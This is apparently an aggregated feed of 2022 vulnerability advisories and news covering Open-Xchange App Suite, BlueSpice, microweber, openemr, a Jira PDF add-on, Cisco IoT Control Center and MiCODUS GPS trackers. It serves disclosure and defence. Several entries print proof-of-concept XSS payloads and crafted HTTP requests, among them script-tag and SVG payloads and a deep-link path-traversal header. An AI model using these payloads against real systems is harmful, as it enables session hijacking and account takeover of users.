Open-Xchange App Suite versions 7.10.6 and below suffer from OS command injection and cross site scripting vulnerabilities. One particular cross site scripting issue only affects versions 7.10.5 and below.

Product: OX App Suite  
Vendor: OX Software GmbH

Internal reference: DOCS-4106  
Vulnerability type: OS Command Injection (CWE-78)  
Vulnerable version: 7.10.6 and earlier  
Vulnerable component: documentconverter  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Fixed version: 7.8.4-rev13, 7.10.3-rev6, 7.10.4-rev6, 7.10.5-rev5, 7.10.6-rev3  
Vendor notification: 2022-01-10  
Solution date: 2022-01-13  
Public disclosure: 2022-07-21  
CVE reference: CVE-2022-23100  
CVSS: 8.2 (CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L)

Vulnerability Details:  
OX Documentconverter has a Remote Code Execution flaw that allows authenticated OX App Suite users to run commands on the instance which runs OX Documentconverter if they have the ability to perform document conversions, for example of E-Mail attachments or OX Drive content.

Risk:  
Attackers can inject arbitrary operating-system level commands via OX App Suite API and/or OX Documentconverter API. Commands are executed on the instance running OX Documentconverter, based on "open-xchange" user privileges. This can be used to modify or exfiltrate configuration files as well as adversely affect the instances availability by excessive resource usage. By default the vulnerable Documentconverter API is not publicly accessible, however this might be worked around by abusing other weaknesses, configuration flaws or social engineering.

Steps to reproduce:  
1. Create a forged Documentconverter API call that embeds escape characters and a system command  
2. Inject the malicious API call via App Suite as a proxy or other means

Solution:  
We reduceed available API parameters to a limited set of enumerations, rather than accepting API input.

---

Internal reference: MWB-1350  
Vulnerability type: Cross-Site Scripting (CWE-80)  
Vulnerable version: 7.10.6 and earlier  
Vulnerable component: backend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Fixed version: 7.8.4-rev78, 7.10.3-rev38, 7.10.4-rev31, 7.10.5-rev37, 7.10.6-rev9  
Vendor notification: 2021-11-30  
Solution date: 2022-02-15  
Public disclosure: 2022-07-21  
CVE reference: CVE-2022-23099  
CVSS: 3.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:  
Existing sanitization and filtering mechanisms for HTML files can be bypassed by forcing block-wise read. Using this technique, the recognition procedure misses to detect tags and attributes that span multiple blocks.

Risk:  
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink.

Steps to reproduce:  
1. As attacker, create a HTML malicious code-snippet which masks tags (e.g. <script>) by block boundaries  
2. Upload the code snippet to drive and create a sharing link  
3. Sent that link to a victim and make it follow it

Solution:  
We now check for possible HTML content through overlapping reads from data streams.

---

Internal reference: MWB-1366  
Vulnerability type: n/a  
Vulnerable version: 7.10.6 and earlier  
Vulnerable component: middleware  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Fixed version: 7.8.4-rev78, 7.10.3-rev38, 7.10.4-rev31, 7.10.5-rev38, 7.10.6-rev9  
Vendor notification: 2021-12-10  
Solution date: 2022-02-15  
Public disclosure: 2022-07-21  
CVE reference: CVE-2021-42550  
CVSS: n/a

Vulnerability Details:  
In the wake of the CVE-2021-44228 (Log4Shell) issue, a similar potential vulnerability at the Logback library has been identified (LOGBACK-1591, CVE-2021-42550). At its default configuration, OX App Suite is not susceptible to this vulnerability and there are no scenarios that require to deploy a vulnerable configuration.

Risk:  
We provide this update strictly as a precaution to mitigate the possibility of a vulnerability. Exploiting CVE-2021-42550 at this point would require privileged access to alter system configuration.

Steps to reproduce:  
1. n/a

Solution:  
We provided a component update to Logback 1.2.8 and slf4j 1.7.32.

---

Internal reference: OXUIB-1172  
Vulnerability type: Cross-Site Scripting (CWE-80)  
Vulnerable version: 7.10.5 and earlier  
Vulnerable component: frontend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Fixed version: 7.8.4-rev69, 7.10.3-rev31, 7.10.4-rev28, 7.10.5-rev30  
Vendor notification: 2021-11-30  
Solution date: 2022-02-15  
Public disclosure: 2022-07-21  
CVE reference: CVE-2022-23101  
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:  
Deep-links within E-Mail (e.g. links to Drive files) are not checked for malicious use of the appHandler function (see CVE-2021-38374) and may therefore be used to inject references to malicious code.

Risk:  
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require to forge App Suite specific mails and force the victim to follow a hyperlink.

Steps to reproduce:  
1. As an attacker, create a malicious E-Mail that uses App Suite "Deep-links" as mail header and embed a call to the AppLoader component  
2. Deliver the mail and make the victim open the link

Proof of concept:  
X-Open-Xchange-Share-URL: https://example.com/#!!&app=%2e./%2e./%2e./%2e./%2e./%2e./appsuite/drive/script.js?cut=&id=123

Solution:  
We now check for a enumeration of valid applications for deep-links as well.

---

Internal reference: DOCS-4161  
Vulnerability type: OS Command Injection (CWE-78)  
Vulnerable version: 7.10.6 and earlier  
Vulnerable component: documentconverter  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Fixed version: 7.8.4-rev14, 7.10.3-rev7, 7.10.4-rev7, 7.10.5-rev6, 7.10.6-rev3  
Vendor notification: 2022-01-24  
Solution date: 2022-02-15  
Public disclosure: 2022-07-21  
CVE reference: CVE-2022-24405  
CVSS: 7.3 (CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N)

Vulnerability Details:  
The compatibility layer of documentconverter API processes serialized Java classes when using remote cache calls. This can be exploited to inject malicious code that is being executed in the context of the documentconverter component.

Risk:  
Attackers can inject arbitrary operating-system level commands via the OX Documentconverter API. Commands are executed on the instance running OX Documentconverter, based on "open-xchange" user privileges. This can be used to modify or exfiltrate configuration files as well as adversely affect the instances availability by excessive resource usage. By default the vulnerable OX Documentconverter API is not publicly accessible and we are not aware that this could have been exploited without privileged network or system access.

Steps to reproduce:  
1. Create a malicious Java class and serialize it  
2. Use the OX Documentconverter API to inject this class as a reference/hash to remote caches

Solution:  
We now apply input sanitization to this API call and retrict it to strings. We also implemented a set of additional hardening procedures for other API calls which work in a similar way.

---

Internal reference: DOCS-4120  
Vulnerability type: Server-Side Request Forgery (CWE-918)  
Vulnerable version: 7.10.6 and earlier  
Vulnerable component: documentconverter-api  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Fixed version: 7.8.4-rev10, 7.10.3-rev5, 7.10.4-rev6, 7.10.5-rev6, 7.10.6-rev3  
Vendor notification: 2022-01-10  
Solution date: 2022-02-15  
Public disclosure: 2022-07-21  
CVE reference: CVE-2022-24406  
CVSS: 6.4 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)

Vulnerability Details:  
By creating colissions of HTTP multipart-formdata boundaries it is possible to alter the API request parameters between OX App Suite and OX Documentconverter. Legitimate multipart-formdata boundaries are created based on a timestamp with millisecond resolution. This allows attackers to predict the next boundary and attempt to overwrite its content. The most practical way to exploit this is sending a large number of formdata parts, each with a unique boundary based on a future point in time.

Risk:  
Attackers can modify parameters of internal API calls to OX Documentconverter and by that circumvent network trust boundaries. In effect, a server-side request forgery attack is possible, for example to exploit DOCS-4106 (CVE-2022-23100) with limited privileges using OX App Suite API as a "proxy".

Steps to reproduce:  
1. Create a HTTP request with multipart-formdata boundaries representing timestamps in the near future  
2. Add internal API parameters to those multipart-formdata sections and use them as requests to OX App Suite API

Solution:  
We modified the algorithm to create multipart-formdata boundaries in a way that they are no longer predictable. We also restricted the number of multipart-formdata parts to a sensible amount and issue an Exception if a client exceeds it.

Open-Xchange App Suite 7.10.x Cross Site Scripting / Command Injection

Cross-site Scripting (XSS) vulnerability in "Extension:ExtendedSearch" of Hallo Welt! GmbH BlueSpice allows attacker to inject arbitrary HTML (XSS) on page "Special:SearchCenter", using the search term in the URL.

Date

2022-01-31

Severity

Medium

Affected

BlueSpice 3.x, BlueSpice 4.x

Fixed in

BlueSpice 3.2.9, BlueSpice 4.1.1

**Problem**

Users are able to inject arbitrary HTML (XSS) on Special:SearchCenter, using the search term. This can be triggered via URL.

**Solution**

Upgrade to BlueSpice 4.1.1

**Acknowledgements**

Special thanks to the security team of an undisclosed customer

CVE-2022-2510: Security:Security Advisories/BSSA-2022-01 - BlueSpice Wiki

Cross-site Scripting (XSS) vulnerability in the "commonuserinterface" component of BlueSpice allows an attacker to inject arbitrary HTML into a page using the title parameter of the call URL.

Date

2022-04-25

Severity

Medium

Affected

BlueSpice 4.x

Fixed in

4.1.3

**Problem**

Users are able to inject arbitrary HTML (XSS) on regular pages, using a special value for the title parameter. This can be triggered via URL.

**Solution**

Upgrade to BlueSpice 4.1.3

**Acknowledgements**

Special thanks to the security team of an undisclosed customer

CVE-2022-2511: Security:Security Advisories/BSSA-2022-02 - BlueSpice Wiki

Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.21.

**Description**

Hi team, I found XSS at /module/.

**Proof of Concept**

Pop up POC: 

Reflected POC: 

Full request payload:

    POST /demo/module/ HTTP/1.1
    Host: demo.microweber.org
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Content-Length: 183
    Origin: https://demo.microweber.org
    Referer: https://demo.microweber.org/demo/shop
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: cross-site
    Te: trailers
    Connection: close
    
    type=shop%2Fcheckout&template=modal&id=js-ajax-cart');});function%20$(num1){alert(1);return%20String(num1)}$(document).ready(function%20()%20{mw.$('-checkout-process&class=no-settings
    

**Impact**

XSS

**Occurrences**

index.php L80-L92

This function does not filter 'id' parameter in script tag, which allows attackers to escape syntax using apostrophe.

CVE-2022-2470: Cross-site Scripting (XSS) - Reflected in microweber

The Better PDF Exporter add-on 10.0.0 for Atlassian Jira is prone to stored XSS via a crafted description to the PDF Templates overview page.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ﻿Advisory ID: SYSS-2022-038 Product: Better PDF Exporter for Jira Manufacturer: Midori Global Consulting Kft. Affected Version(s): 10.0.0 Tested Version(s): 9.6.0 Vulnerability Type: Stored Cross-Site Scripting (CWE-79) Risk Level: Low Solution Status: Open Manufacturer Notification: 2022-05-27 Solution Date: - Public Disclosure: 2022-07-22 CVE Reference: CVE-2022-36131 Author of Advisory: Lukas Faiß, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Better PDF Exporter is an add-on for Jira to export Jira artifacts to PDF files. The manufacturer describes the product as follows (see \[1\]): "Better PDF Exporter exports Jira issues to PDF documents to share, print, email, archive and report issues in the standard business document file format." Due to insufficient input validation of user-provided input, Better PDF Exporter is vulnerable to cross-site scripting attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The 'PDF Templates' overview is prone to a stored cross-site scripting attack. XSS vulnerabilities allow an attacker to embed malicious JavaScript code into server replies which is later executed in the web browsers of other users. By executing JavaScript, attackers can, for example, perform actions in the context of other logged-in users. For testing purposes, the add-on of the manufacturer\[1\] was used in a local Jira Server\[4\] installation. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The 'PDF Template' view in the administration back end can be exploited for an attack. After entering the attack vector "" in the description field of a PDF template, the following request is sent to the server: POST /rest/com.midori.jira.plugin.pdfview/1.0/pdf-resource/30 HTTP/2 Host: \[REDACTED\] Cookie: Content-Length: 153 Sec-Ch-Ua:"Not A;Brand";v="99","Google Chrome";v="101" Accept: \*/\* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Sec-Ch-Ua-Platform: "Linux" Origin: \[REDACTED\] Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: \[REDACTED\]/secure/update-pdf-resource.jspa?id=30 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 name=Pentest.pdf&description=%3cscript%3ealert('SySS\_PXSS\_PoC')%3b%3c %2fscript%3e&content=content By calling the 'PDF Template' overview page through the URL "https://\[REDACTED\]/secure/pdf-resources.jspa", the payload is loaded and executed. The payload is listed in the following response: ... Pentest.pdf

CVE-2022-36131

Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber prior to 1.2.21.

**Description**

By uploading SVG files, the users can perform Stored XSS attack.

**Payload**

Copy the following code and save as filename.svg. <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>

**Proof of Concept**

\[1\] Login as admin.

\[2\] upload the payload injected SVG file at https://demo.microweber.org/demo/admin/view:modules/load_module:files

\[3\] Copy the uploaded svg file url and open in new tab.

\[4\] XSS!

**Impact**

If an attacker can execute the script in the victim's browser via SVG file, they might compromise that user by stealing its cookies.

CVE-2022-2495: Stored XSS via SVG File  in microweber

Cross-site Scripting (XSS) - Stored in GitHub repository openemr/openemr prior to 7.0.0.

**Description**

openemr / openemr is vulnerable to Cross-site Scripting (XSS) - Stored

**Proof of Concept**

    // Poc 
    <script>alert(document.cookie)</script>
    

steps to reproduce:

    1) login open emr patient portal https://demo.openemr.io/openemr/portal/index.php
    
    2) goto my profile in https://demo.openemr.io/openemr/portal/home.php
    
    ​3)click on pending review.
    
    4)add the payload in the first name /middle name  (<script>alert(document.cookie)</script>)
    
    5) click  submit changes
    
    6) after that we get an with Error: Patient was successfully updated
    
    7) on clicking  pending review  the xss wil be triggered
    

**Impact**

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

CVE-2022-2494: Cross-site Scripting (XSS) - Stored in openemr

A vulnerability in the web-based management interface of Cisco IoT Control Center could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.

**

Summary

**

*   A vulnerability in the web-based management interface of Cisco IoT Control Center could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.
    
    This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.
    
    Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
    
    This advisory is available at the following link:  
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iotcc-xss-WQrCLRVd
    

**

Affected Products

**

*   This vulnerability affects Cisco IoT Control Center, which is cloud based.
    
    Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability.
    

**

Workarounds

**

*   There are no workarounds that address this vulnerability.
    

**

Fixed Software

**

*   Cisco has addressed this vulnerability in Cisco IoT Control Center, which is cloud based. No user action is required.
    
    Customers who need additional information are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.
    

**

Exploitation and Public Announcements

**

*   The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.
    

**

Source

**

*   Cisco would like to thank Ahmad Ali Almegbas for reporting this vulnerability.
    

**

Cisco Security Vulnerability Policy

**

*   To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy. This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco.
    

**

Related to This Advisory

**

**

URL

**

**

Revision History

**

*   Version
    
    Description
    
    Section
    
    Status
    
    Date
    
    1.0
    
    Initial public release.
    
    \-
    
    Final
    
    2022-JUL-20
    
    Show Less
    

**

Legal Disclaimer

**

*   THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.
    
    A standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products.
    

**

Feedback

**

CVE-2022-20916: Cisco Security Advisory: Cisco IoT Control Center Cross-Site Scripting Vulnerability

By Deeba Ahmed
The MV720 GPS tracker is manufactured by a China-based company MiCODUS which was informed about the flaws back…
This is a post from HackRead.com Read the original post: Critical Vulnerability in Popular GPS Tracker Lets Hackers Remotely Control Vehicles

****The MV720 GPS tracker is manufactured by a China-based company MiCODUS which was informed about the flaws back in September 2021 yet it has not fixed the issue.****

Cybersecurity startup BitSight has identified six flaws in the GPS tracker MV720 manufactured by China-based MiCODUS. According to the IT security researchers at BitSight the critical security vulnerabilities were present in MV720 GPS trackers, used primarily for tracking vehicle fleets. The vulnerabilities can allow hackers to track, stop, and control vehicles remotely.

For your information, MV720 is a hardwired GPS tracker worth around $20. The Shenzhen-based MiCODUS electronics maker claims that 1.5 million of its GPS trackers are currently in use by over 420,000 customers across 169 countries.

Furthermore, its clients include several Fortune 50 companies, shipping, aerospace, government, military, critical infrastructure, law enforcement agencies, and a nuclear power plant operator.

**Vulnerabilities Details**

BitSight has detected six severe vulnerabilities in the abovementioned tracker, which can be easily exploited remotely to track a vehicle in real-time, get information about previous routes, and even cut the vehicles’ engines when in motion.

BitSight’s principal security researcher and report author, Pedro Umbelino, explained that the vulnerabilities’ easy exploitation raises “significant questions” about the company’s products as the bugs may not be restricted to one GPS tracker model. He believes the same flaws are present in other tracker models.

MV720 GPS tracker

**Dangers Posed by the Flaws**

According to BitSight’s blog post, one flaw in MV720 is in unencrypted HTTP communications, allowing hackers to remotely conduct adversary-in-the-middle attacks (AiTM) to intercept/change the requests exchanged between the servers and the mobile application.

Another flaw is found in the tracker’s authentication mechanism in the mobile app, which lets attackers access the hardcoded key to lock down the trackers and use a custom IP address. This enables hackers to monitor and control communications to and from the device.

The vulnerability tracked as CVE-2022-2107 is assigned a severity rating of 9.8 out of 10. It is a hardcoded password that MiCODUS trackers use as a master password. If obtained by hackers, they can use this passcode to log into the web server and pose as an authentic user to send commands to the tracker via SMS communications.

Hence, they can fully control any GPS tracker, access location details, disarm the alarm, change routes and geofences, and cut off vehicles’ fuel.

Another vulnerability tracked as CVE-2022-2141 enables a broken authentication state in the protocol used by the tracker to communicate with the MiCODUS server. Then there’s a reflected cross-site scripting error identified in the Web server. Tracking designations of other vulnerabilities are CVE-2022-2199, CVE-2022-34150, and CVE-2022-33944.

In its technical write-up , BitSight warned MiCODUS in September 2021 about the flaws. However, after the company’s lukewarm response, CISA and BitSight decided to make the findings public. The vulnerabilities are still unpatched. BitSight recommends that all organizations and individuals using MV720 GPS trackers immediately disable the devices until they are patched.

> Organizations and individuals using MV720 devices in their vehicles are at risk. Leveraging our proprietary data sets, BitSight discovered MiCODUS devices used in 169 countries by organizations including government agencies, military, and law enforcement, as well as businesses spanning a variety of sectors and industries including aerospace, energy, engineering, manufacturing, shipping, and more. Given the impact and severity of the vulnerabilities found, it is highly recommended that users immediately stop using or disable any MiCODUS MV720 GPS trackers until a fix is made available.
> 
> BitSight

1.  Woman Follows GPS, Goes Straight into Lake
2.  600,000 GPS child trackers found vulnerable to location tracking
3.  Security Flaws in GPS Trackers Puts Millions of Devices’ Data at Risk
4.  Shoddy security of smartwatch lets hackers access your child’s location
5.  Strava’s Global Heat Map Exposes User Locations Including Military Bases

Critical Vulnerability in Popular GPS Tracker Lets Hackers Remotely Control Vehicles

The Monroe Electronics / Digital Alert Systems OneNet SE DASDEC Emergency Alert System Appliance suffers from cross site scripting and html injection vulnerabilities.

Tag

#xss